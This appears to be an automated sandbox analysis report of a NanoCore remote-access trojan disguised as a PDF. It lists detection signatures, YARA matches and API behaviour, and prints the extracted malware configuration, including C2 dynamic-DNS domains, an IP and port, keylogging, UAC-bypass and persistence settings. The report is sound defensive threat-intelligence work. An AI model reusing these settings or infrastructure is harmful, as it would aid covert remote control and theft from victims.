Windows Analysis Report
026910003102350.pdf.scr.exe

Overview

General Information

Sample Name: 026910003102350.pdf.scr.exe
Analysis ID: 796783
MD5: c2a80ccf6362bba805072de9ce963ea5
SHA1: c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
SHA256: 592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
Tags: exe

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

AV Detection

Source: december2n.duckdns.org Avira URL Cloud: Label: malware
Source: december2nd.ddns.net Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Avira: detection malicious, Label: DR/AutoIt.Gen
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
Source: 026910003102350.pdf.scr.exe ReversingLabs: Detection: 46%
Source: 026910003102350.pdf.scr.exe Virustotal: Detection: 45%
Source: december2nd.ddns.net Virustotal: Detection: 12%
Source: december2n.duckdns.org Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe ReversingLabs: Detection: 46%
Source: 3.2.RegSvcs.exe.60b0000.7.unpack Avira: Label: TR/NanoCore.fadte
Source: 19.2.RegSvcs.exe.d00000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n 
<Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Source: 026910003102350.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 026910003102350.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00CCA69B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00CDC220
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CEB348 FindFirstFileExA, 0_2_00CEB348
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 2_2_0037E387
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0037D836
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_0038A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 2_2_0038A488
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose, 2_2_003865F1
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0034C642 FindFirstFileExW, 2_2_0034C642
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00387248 FindFirstFileW,FindClose, 2_2_00387248
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 2_2_003872E9
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0037DB69

Networking

Source: unknown DNS query: name: december2n.duckdns.org
Source: unknown DNS query: name: december2nd.ddns.net
Source: Malware configuration extractor URLs: december2n.duckdns.org
Source: Malware configuration extractor URLs: december2nd.ddns.net
Source: Joe Sandbox View ASN Name: SPD-NETTR
Source: Joe Sandbox View IP Address: 212.193.30.230
Source: global traffic TCP traffic: 192.168.2.5:49700 -> 212.193.30.230:60705
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown DNS traffic detected: queries for: december2n.duckdns.org
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent, 2_2_0038D7A1
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 2_2_0037A54A
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 2_2_0038F45C
Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: RegisterRawInputDevices
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003A9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 2_2_003A9ED5

E-Banking Fraud

Source: Yara match File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: 01 00 00 00

System Summary

Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
